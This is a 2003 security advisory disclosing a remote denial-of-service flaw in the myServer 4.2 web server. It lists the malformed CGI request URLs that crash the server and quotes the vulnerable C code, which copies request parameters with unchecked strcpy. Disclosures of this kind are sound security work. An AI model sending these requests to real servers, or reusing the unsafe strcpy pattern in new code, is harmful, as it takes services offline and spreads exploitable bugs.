|
------------------------------------------------------------------ - EXPL-A-2003-012 exploitlabs.com Advisory 012 ------------------------------------------------------------------ -= myServer =- Donnie Werner July 5, 2003 Vunerability(s): ---------------- Denial of Service Product: -------- myServer httpd - 4.2 ( current ) http://myserverweb.sourceforge.net http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerWIN32EXEC-0.4.2.zip http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerSRC-0.4.2.zip Description of product: ----------------------- "It is a web server that allow everybody to have his own web server for free. It is easy to configure and manage, it is available for linux and windows. It supports the CGI, ISAPI, WinCGI and FastCGI. Visit the homepage for more info." note: http://www.securitytracker.com/alerts/2003/Jun/1006999.html has NOT been fixed as of ver 4.2 http://www.security-protocols.com/print.php?sid=1534 appears fixed or not an issue in 4.2 under win VUNERABILITY / EXPLOIT ====================== tested on Windows XP / 2k issuing... http://[host]/cgi-bin/math_sum.mscgi?a= http://[host]/cgi-bin/math_sum.mscgi??= completly crashes the httpd on the remote host proally cuz.. ------------ snip ------------ strcpy(a,cm.GetParam("a")); strcpy(b,cm.GetParam("b")); sprintf(c,"%i",atoi(a)+atoi(b)); ------------ snip ------------ also.. http://[host]/cgi-bin/post.mscgi??? crashes server Local: ------ no Remote: ------- yes Vendor Fix: ----------- No fix on 0day Vendor has responded and claims the fix is in the CVS, and will be resolved as of the upcomming 4.3 release. Vendor Contact: --------------- Concurrent with this advisory http://sourceforge.net/tracker/?func=add&group_id=63119&atid=502904 Credits: -------- Donnie Werner morning_wood@exploitlabs.com http://exploitlabs.com thank you "nutcase" for confirmation testing